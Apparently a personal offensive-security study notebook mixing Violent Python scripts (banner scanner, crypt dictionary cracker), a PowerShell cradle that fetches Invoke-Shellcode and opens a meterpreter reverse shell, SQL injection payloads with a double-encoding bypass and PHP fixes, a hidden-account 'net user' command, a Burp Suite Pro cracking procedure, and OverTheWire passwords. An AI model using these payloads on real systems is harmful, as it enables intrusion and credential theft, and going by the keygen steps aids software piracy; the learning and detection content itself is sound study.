Dark_Study

Violent_Python (Gray Hat Hacking)

A simple port scanner (banner grabbing with a vulnerable-version check)

#!/usr/bin/env python3

import socket
import os
import sys


def retBanner(ip, port):
    """
    Open a TCP connection and read whatever the service sends first.
    Returns the raw banner bytes, or the exception when the connection
    fails (refused, timed out, reset) so the caller can report it.
    """
    try:
        socket.setdefaulttimeout(2)
        s = socket.socket()
        s.connect((ip, port))
        # Note: HTTP/HTTPS servers wait for a request, so recv() on 80/443
        # normally just times out; only self-announcing services (FTP, SSH,
        # SMTP, POP3) return a banner unprompted.
        banner = s.recv(1024)
        s.close()
        return banner
    except Exception as e:
        return e


def checkVulns(banner, filename):
    """
    Compare the grabbed banner against known-vulnerable version strings,
    one per line in `filename`.
    """
    text = banner.decode('utf-8', errors='replace')
    with open(filename, 'r') as f:
        for line in f:
            line = line.strip('\n')
            if line and line in text:
                print('[+] Server is vulnerable: ' + text.strip() + '\n')


def main():
    # the only argument is the file of vulnerable version strings
    if len(sys.argv) == 2:
        filename = sys.argv[1]
        if not os.path.isfile(filename):
            print('[-] ' + filename + ' does not exist')
            sys.exit(1)
        elif not os.access(filename, os.R_OK):
            print('[-] ' + filename + ' access denied.')
            sys.exit(1)
    else:
        print('[-] Usage: ' + str(sys.argv[0]) + ' <vuln filename>')
        sys.exit(1)

    # ftp, ssh, smtp, http, pop3, https
    port_list = [21, 22, 25, 80, 110, 443]
    for i in range(130, 135):
        ip = '192.168.19.' + str(i)
        for port in port_list:
            banner = retBanner(ip, port)
            if not banner:
                continue            # peer closed without sending anything
            if not isinstance(banner, bytes):
                # retBanner handed back the exception: report it, but it is
                # not a banner and must not be matched against the vuln list
                print('[-] ' + ip + ':' + str(port) + ' ' + str(banner))
                continue
            print('[+] ' + ip + ':' + str(port) + ' ' +
                  banner.decode('utf-8', errors='replace').strip('\r\n'))
            checkVulns(banner, filename)


if __name__ == "__main__":
    main()

A password-cracking script (dictionary attack on crypt(3) hashes)

#!/usr/bin/env python3

import crypt  # Unix only; deprecated since Python 3.11 and removed in 3.13


def testPass(cryptPass):
    """
    Dictionary attack against one crypt(3) hash.
    """
    cryptPass = cryptPass.strip()
    # Traditional DES crypt: the first two characters are the salt.
    # Modular-format hashes ($1$ md5, $5$ sha256, $6$ sha512, ...) carry the
    # algorithm id, optional rounds and salt inside the string, so the whole
    # hash is passed as the "salt" argument and crypt() reads them from it.
    salt = cryptPass if cryptPass.startswith('$') else cryptPass[0:2]
    with open("dictionary.txt", "r") as dictfile:
        for word in dictfile:
            word = word.strip('\n')     # otherwise the trailing "\n" gets hashed too
            cryptWord = crypt.crypt(word, salt)
            if cryptPass == cryptWord:
                print("Found Password: ", word + '\n')
                return
    print("Password not Found !")


def main():
    with open("passwords.txt", "r") as passfile:
        for line in passfile:
            # line format "root:HXs8120d." (user:hash, classic /etc/passwd layout)
            user = line.split(':')[0]
            cryptPass = line.split(':')[1].strip()   # strip('') was a no-op
            print("Cracking Password For: ", user)
            testPass(cryptPass)


if __name__ == '__main__':
    main()
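The script above hashes every dictionary word once per user and only understands the two-character DES salt. The following is an added example, not code from Violent Python or from these notes, that generalises the same dictionary attack: it parses user:hash lines, skips locked accounts ("*" / "!"), extracts the salt setting for both DES and modular-crypt ("$id$...") hashes, and groups targets by salt so each word is hashed once per salt. The hash function is pluggable; the `demo_hash` scheme used for the runnable sample is an assumption made up for this example (sha256 of salt+password) and is not crypt(3).

```python
import hashlib
from collections import defaultdict


def demo_hash(setting, password):
    """Stand-in hash for this example only (an assumption, NOT crypt(3)):
    '$demo$<salt>$<sha256(salt+password) hex>'. `setting` is the
    '$demo$<salt>' prefix, the same shape crypt.crypt(word, '$6$<salt>')
    takes for a real sha512crypt hash."""
    salt = setting.rsplit('$', 1)[1]
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return '%s$%s' % (setting, digest)


def salt_setting(stored):
    """Return the salt setting to feed the hash function, or None when the
    account has nothing crackable. Modular-crypt hashes keep everything
    before the final '$' (id, optional rounds=, salt); traditional DES
    crypt keeps the first two characters."""
    stored = stored.strip()
    if not stored or stored[0] in '*!':
        return None                     # locked account / no password set
    if stored.startswith('$'):
        return stored.rsplit('$', 1)[0]
    return stored[:2]


def crack(passwd_lines, wordlist, hash_fn=demo_hash):
    """Dictionary attack over 'user:hash' lines (passwd/shadow layout).
    Targets are grouped by salt setting so every dictionary word is hashed
    once per salt rather than once per user. Returns {user: cleartext}."""
    by_setting = defaultdict(lambda: defaultdict(list))   # setting -> hash -> users
    for line in passwd_lines:
        line = line.rstrip('\n')
        if ':' not in line:
            continue
        user, stored = line.split(':', 2)[:2]
        setting = salt_setting(stored)
        if setting is not None:
            by_setting[setting][stored.strip()].append(user)

    found = {}
    for setting, targets in by_setting.items():
        pending = dict(targets)
        for word in wordlist:
            word = word.rstrip('\n')    # the "\n" the notes warn about
            candidate = hash_fn(setting, word)
            if candidate in pending:
                for user in pending.pop(candidate):
                    found[user] = word
                if not pending:
                    break               # every hash under this salt is cracked
    return found


# Constructed sample input in the same layout as passwords.txt / dictionary.txt
SAMPLE_PASSWD = [
    'root:' + demo_hash('$demo$ab', 'toor'),
    'alice:' + demo_hash('$demo$ab', 'letmein'),
    'bob:' + demo_hash('$demo$cd', 'toor'),
    'daemon:*',
    'guest:!',
    'eve:' + demo_hash('$demo$ef', 'correcthorsebatterystaple'),
]
SAMPLE_WORDLIST = ['123456\n', 'toor\n', 'letmein\n', 'password\n']


if __name__ == '__main__':
    for user, pw in crack(SAMPLE_PASSWD, SAMPLE_WORDLIST).items():
        print('Found Password For %s: %s' % (user, pw))
```

Against a real shadow file on a Unix host, pass `hash_fn=lambda setting, word: crypt.crypt(word, setting)`; the salt-grouping then matters, because sha512crypt and yescrypt are deliberately slow and the per-salt cost dominates.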

The Hacker Playbook: Practical Guide to Penetration Testing

PowerShell

1
2
3
4
5
6
7
8
9
10
11
# 64-bit PowerShell (the default powershell.exe on a 64-bit host)
powershell.exe -NoP -NonI -W Hidden -Exec Bypass

-NoP --> -NoProfile: do not load the current user's profile scripts
-NonI --> -NonInteractive: do not present an interactive prompt
-W Hidden --> -WindowStyle Hidden: hide the console window
-Exec Bypass --> -ExecutionPolicy Bypass: ignore the script execution policy for this process (the policy is an administrative safety setting, not a security boundary, which is why a command-line switch can turn it off)
-NoExit --> keep the shell open after the command finishes

# 32-bit PowerShell on a 64-bit host (SysWOW64 holds the 32-bit binaries; use it when the injected shellcode is 32-bit)
%WinDir%\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass

Invoke--Shellcode.ps1 script (the double hyphen is this fork's renaming of the file and function; upstream PowerSploit calls it Invoke-Shellcode)

  • https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1

  • %WinDir%\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke--Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80

  • Run a script file that is already on the target

    %WinDir%\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "& {Import-Module [Path and File of PowerShell]; [Parameters]}"

  • Base64-encoded command (-enc takes the command text encoded as UTF-16LE and then Base64)

    %WinDir%\syswow64\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 Code]
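The notes leave "[Base64 Code]" abstract. The following is an added example, not from The Hacker Playbook or these notes, that shows both sides of that switch in Python: building the -EncodedCommand argument (UTF-16LE, then Base64) for the download-cradle one-liner above, and the detection-side inverse of pulling the blob out of a logged command line and decoding it. The host attacker.example and the sample command line are constructed for the example.

```python
import base64
import re


def encode_powershell_command(command):
    """Build the argument powershell.exe expects after -EncodedCommand / -enc:
    the command text encoded as UTF-16LE, then Base64 (ASCII text)."""
    return base64.b64encode(command.encode('utf-16-le')).decode('ascii')


def decode_powershell_command(blob):
    """Reverse of the above, i.e. what an analyst does with an -enc blob taken
    from a process-creation record (Sysmon Event ID 1, Security 4688)."""
    blob += '=' * (-len(blob) % 4)      # tolerate stripped Base64 padding
    return base64.b64decode(blob).decode('utf-16-le')


# powershell.exe accepts unambiguous prefixes of the switch name, so a logged
# command line may read -e, -ec, -enc, -encoded or -EncodedCommand, in any case.
ENC_SWITCH = re.compile(
    r'(?:^|\s)-e(?:c|nc(?:oded(?:command)?)?)?\s+([A-Za-z0-9+/]+=*)', re.IGNORECASE)


def find_encoded_commands(cmdline):
    """Return the decoded text of every encoded command found in a command line."""
    return [decode_powershell_command(blob) for blob in ENC_SWITCH.findall(cmdline)]


# Constructed example: the download cradle from the notes with a placeholder
# host (attacker.example is an assumption, not a real address), and a
# process-creation command line built from it.
DOWNLOAD_CRADLE = ("IEX (New-Object Net.WebClient).DownloadString("
                   "'http://attacker.example/Invoke--Shellcode.ps1')")
SAMPLE_CMDLINE = (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "
                  "-NoP -NonI -W Hidden -Exec Bypass -enc "
                  + encode_powershell_command(DOWNLOAD_CRADLE))


if __name__ == '__main__':
    print("-enc " + encode_powershell_command(DOWNLOAD_CRADLE))
    for cmd in find_encoded_commands(SAMPLE_CMDLINE):
        print("decoded from log line:", cmd)
```

The regex deliberately matches any accepted spelling of the switch: a detection rule keyed on the literal string "-enc" misses "-e" and "-ec", which run the same way.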

Easy-P

ZeroNet

On Linux, run Zeronet.sh

Tor: set the browser's network settings to "no proxy"

(9150 is Tor Browser's SOCKS port and 9151 its control port; ZeroNet's [global] section is pointed at both)
[global]
9150
9151

Tool usage

Mini-course link

Install Windows Server 2003 Enterprise x64
Thunder (Xunlei) download link

Create a Server 2003 virtual machine in VMware

Key
BVPPQ-CDPXV-8JBRH-9H9T6-3RXV3

Add/Remove Programs: install IIS, then allow ASP under Web Service Extensions

SQL injection

Classic SQL injection
and 1=1 union select 1, @@version
Read the error message, the SQL server version and the operating system from the response
/@@version

Quick check for SQL injection
Classic: and 1=1
# append "and 1=1" to the URL (page unchanged)
# append "and 1=2" to the URL (page changes or errors: the input reaches the query)

Classic: single quote ' test (a bare quote that breaks the query shows the value is concatenated into the SQL string)

and 1=2 union select 1,@@version,user()
(the UNION must select the same number of columns as the original query; "1=2" empties the original result so only the injected row comes back)

PHP GPC (magic_quotes_gpc) bypass
Encode, then encode again
' encodes to %27, and %27 encoded again is %2527
# encodes to %23 (a raw # would start the URL fragment and never reach the server)
This only works when the application URL-decodes the parameter a second time after magic_quotes escaped it: the first decode yields the literal text "%27", which contains no quote to escape, and the second decode turns it into '.

demo
?id=%2527 and 1=2 union select 1,2,user() %23

Fixing SQL injection in PHP

Type cast (for numeric ids)
intval($id)

Parameter check

if(!is_numeric($id))
{
echo "error";
exit();
}

(is_numeric() also accepts floats and exponent forms such as "1e3"; for an integer id prefer intval() or ctype_digit(), and use prepared statements for any value that is not a number)

PHP_GPC
require_once('common.php')
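To make the double-encoding bypass and the two fixes above concrete, here is an added example (not from the notes) that models the request pipeline in Python: the web server's single URL-decode, a PHP-style addslashes() standing in for magic_quotes_gpc, an optional second urldecode() by the application, and string concatenation into the query. It runs the notes' payload against an in-memory SQLite table (constructed for the example) and then against a parameterised, integer-cast query. Assumptions: SQLite's sqlite_version() replaces MySQL's @@version/user(), and "--" replaces the "#" (%23) comment, which MySQL understands but SQLite does not.

```python
import sqlite3
from urllib.parse import unquote


def addslashes(s):
    """PHP addslashes(), which is what magic_quotes_gpc applied to every
    GET/POST/COOKIE value: backslash-escape ' " \\ and NUL."""
    return (s.replace('\\', '\\\\').replace("'", "\\'")
             .replace('"', '\\"').replace('\x00', '\\0'))


def build_vulnerable_sql(raw_id, app_decodes_again):
    """Model of the vulnerable page: the web server URL-decodes the query
    string once, magic_quotes_gpc escapes quotes, then the value is glued
    into the SQL string. When the application calls urldecode() itself as
    well, the double-encoded %2527 only becomes a quote AFTER the escaping
    ran, which is the bypass the notes describe."""
    value = unquote(raw_id)            # decode #1 (web server): %2527 -> %27
    value = addslashes(value)          # magic_quotes_gpc: sees no quote, leaves "%27"
    if app_decodes_again:
        value = unquote(value)         # decode #2 (application): %27 -> '
    return "SELECT id, name FROM users WHERE id = '%s'" % value


def run_vulnerable(conn, raw_id, app_decodes_again):
    return conn.execute(build_vulnerable_sql(raw_id, app_decodes_again)).fetchall()


def run_safe(conn, raw_id):
    """Hardened version: cast the id to an integer (the notes' intval() /
    is_numeric() guard) and bind it as a parameter, so no amount of
    decoding can change the statement's structure."""
    try:
        id_num = int(unquote(unquote(raw_id)))
    except ValueError:
        return []                      # reject instead of querying
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (id_num,)).fetchall()


def demo_db():
    """Constructed in-memory table standing in for the application's database."""
    conn = sqlite3.connect(':memory:')
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", [(1, 'admin'), (2, 'guest')])
    return conn


# The notes' payload "?id=%2527 and 1=2 union select 1,2,user() %23", adapted
# to SQLite (see the lead-in). Two columns are selected because the original
# query returns two columns (id, name); a mismatch is a UNION error.
PAYLOAD = "%2527 and 1=2 union select 1,sqlite_version() --%20"


if __name__ == '__main__':
    conn = demo_db()
    print(build_vulnerable_sql(PAYLOAD, True))
    print("magic_quotes only:    ", run_vulnerable(conn, PAYLOAD, False))
    print("plus app urldecode(): ", run_vulnerable(conn, PAYLOAD, True))
    print("parameterised query:  ", run_safe(conn, PAYLOAD))
```

With only magic_quotes in the path the injected text stays a harmless string and the query returns nothing; add the application's own urldecode() and the same request returns the injected row (the database version) in place of a user. The parameterised query returns nothing for the payload and the right row for a plain or even double-encoded numeric id.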

MD5 "decryption" (a lookup of precomputed hashes; MD5 itself is not reversible)
www.cmd5.com

ASP one-line webshell (一句话木马)

ASP full-featured webshell (大马)

Add a Windows user
net user haha 123456 /add
net user

Code reading ability

Seay source-code audit system

China Chopper (中国菜刀)

Ah-D (啊D) injection tool

CTF

Burp Suite: POST request flag

Install Burp Suite Community Edition
download link

Download the crack patch 1.7.34_Loader_Keygen
reference link

# Cracking procedure (Windows + Linux)
First, download the Community edition installer from the Burp Suite site.
After installing, find the install directory; it contains burpsuite_community.jar.
Rename the cracked Pro jar to burpsuite_community.jar and replace the original file.
Edit BurpSuiteCommunity.vmoptions to contain:
-Xmx4096m
-Xbootclasspath/p:burp-loader-keygen.jar

Open burp-loader-keygen.jar
Change the License Text
Start BurpSuiteCommunity.exe
Decline assistance, accept the agreement
Copy the License from burp-loader-keygen into Burp Suite
Click Manual activation to get the Request
Paste the Request into burp-loader-keygen's Activation Request
Copy the auto-generated Activation Response back into Burp Suite
Done, start using it
Caveat: the loader is an unsigned third-party jar prepended to the JVM boot classpath, so it runs with Burp's full privileges and sees every request that passes through the proxy; treat it as untrusted code.

Open http://120.24.86.145:8002/post/ in Chrome

The expected statement is shown right on the page: what='flag'

So all that is needed is a POST body with a key "what" whose value is "flag"

Chrome: Settings > Advanced > System > Open proxy settings
127.0.0.1 8081

Burp Suite: Proxy > Options
select the listener and change it to 127.0.0.1:8081

Then reload http://120.24.86.145:8002/post/

In Burp's Proxy > Intercept the captured request is a GET, so change it to POST
Right-click in Raw > Change request method (Burp adds the Content-Type and Content-Length headers for you)

Add the key/value pair
In Raw, delete any trailing empty lines, press Enter once so that exactly one blank line follows the headers (that blank line is the header/body separator), then type the pair; otherwise the extra blank line becomes part of the body and the server does not parse what=flag as a form field
what=flag

Then either right-click Send to Repeater to keep editing the request, or Forward it

Repeater

After Forward, the flag is rendered directly in the browser

Configure the Jython jar (needed for Python extensions)
file link

Scapy

Needs root (sudo): scapy sends through raw sockets, so without it the send fails with a permission error
pip3 install scapy

from scapy.all import IP, ICMP, sr1

target = 'www.baidu.com'
ip = IP(src=target)          # src= forges the source address (resolved from the hostname); use dst= for a normal probe
[p for p in ip]              # iterating an IP() expands a range/CIDR into one packet per host
test_ip = sr1(IP(dst='119.75.216.20')/ICMP()/b'haha')   # send one echo request with payload "haha", return the first reply

Some_games

OverTheWire

ssh://bandit0:bandit0@bandit.labs.overthewire.org:2220
password > readme
cat readme

ssh://bandit1:boJ9jbbUNNfktd78OOpsqOltutMc3MY1@bandit.labs.overthewire.org:2220
password > dashed filename (a file literally named "-"; a bare "-" argument means stdin)
cat ./-    (or: cat < -)

ssh://bandit2:CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9@bandit.labs.overthewire.org:2220
password > spaces in filename (quote the name)
cat "spaces in this filename"

ssh://bandit3:UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK@bandit.labs.overthewire.org:2220
password > hidden file (a dot-file, not shown by a plain ls)
cat inhere/.hidden

ssh://bandit4:pIwrPrtPN36QITSp3EQaw936yaFoFgAB@bandit.labs.overthewire.org:2220
password > human word (the only human-readable file among binary ones)

koReBOKuIDDepwhWk7jZC0RTdopnAYKh
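The bandit4 note gives no command. As an added example (not part of the notes or of OverTheWire), here is the check behind "human-readable" in Python: a file is readable when every byte is printable ASCII, which is what `file` reports as ASCII text. The directory it scans is constructed to look like the level's inhere/ (ten dash-named files, nine binary and one text); the text line is a placeholder, not a real password.

```python
import os
import string
import tempfile

PRINTABLE = frozenset(string.printable.encode('ascii'))


def is_human_readable(data):
    """True when every byte is printable ASCII (roughly what `file` calls
    'ASCII text'); a single byte outside that set marks the file as binary."""
    return len(data) > 0 and all(b in PRINTABLE for b in data)


def find_readable_files(directory):
    """Relative paths of the human-readable files under `directory`. Walks
    dot-files and dash-named files too, which a naive `cat *` mishandles."""
    hits = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            with open(path, 'rb') as f:
                if is_human_readable(f.read()):
                    hits.append(os.path.relpath(path, directory))
    return sorted(hits)


def make_sample_dir():
    """Constructed stand-in for the level's inhere/ directory: ten files
    named -file00 .. -file09, nine holding non-printable bytes and one
    holding a line of text (a placeholder, not a real password)."""
    d = tempfile.mkdtemp()
    for i in range(10):
        with open(os.path.join(d, '-file%02d' % i), 'wb') as f:
            if i == 7:
                f.write(b'theHumanReadableOneIsThisLine\n')
            else:
                f.write(bytes([0x80 + i, 0x00, 0xff, 0x9c]) * 8)
    return d


if __name__ == '__main__':
    sample = make_sample_dir()
    print(find_readable_files(sample))   # the file to cat for the password
```

The dash-named files are why the level trips people up: each name has to be passed as ./-fileNN, or the shell treats it as an option.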